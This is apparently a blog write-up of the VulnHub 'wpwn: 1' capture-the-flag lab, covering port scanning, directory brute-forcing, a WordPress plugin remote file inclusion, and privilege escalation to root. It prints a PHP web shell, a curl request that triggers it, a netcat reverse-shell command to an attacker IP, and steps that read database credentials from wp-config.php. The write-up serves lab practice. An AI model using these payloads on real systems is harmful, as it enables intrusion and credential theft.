VulnHub: wpwn: 1

Today we will take a look at Vulnhub: wpwn: 1. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
sudo nmap -p- -sCV --open 192.168.213.123PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster
gobuster dir -u http://192.168.213.123  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.213.123
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/05 18:50:16 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 322]
  • Wpscan
wpscan --url http://192.168.213.123/wordpress
  • Reverse Shell
Command: nano exploit.php<pre>system($_GET[rce])</pre>Command: curl 'http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=id&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php'
http://192.168.213.123/wordpress/wp-admin/admin-post.php?rce=nc%20-e%20/bin/bash%20Your_IP%204242&swp_debug=load_options&swp_url=http://192.168.49.213:1337/exploit.php# Change IP
  • Takis

After login

Command: script /dev/null -c bashCommand: export TERM=xtermctrl+z                            Command: stty raw -echo ; fg                  

Command: reset

Takis’s password

We see the password in the wp-config.php file in the /var/www/html/ wordpress folder.

Command: cat wp-config.php
Command: su Takis
  • Root
Command: sudo -l(ALL) NOPASSWD: ALLCommand: sudo su

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days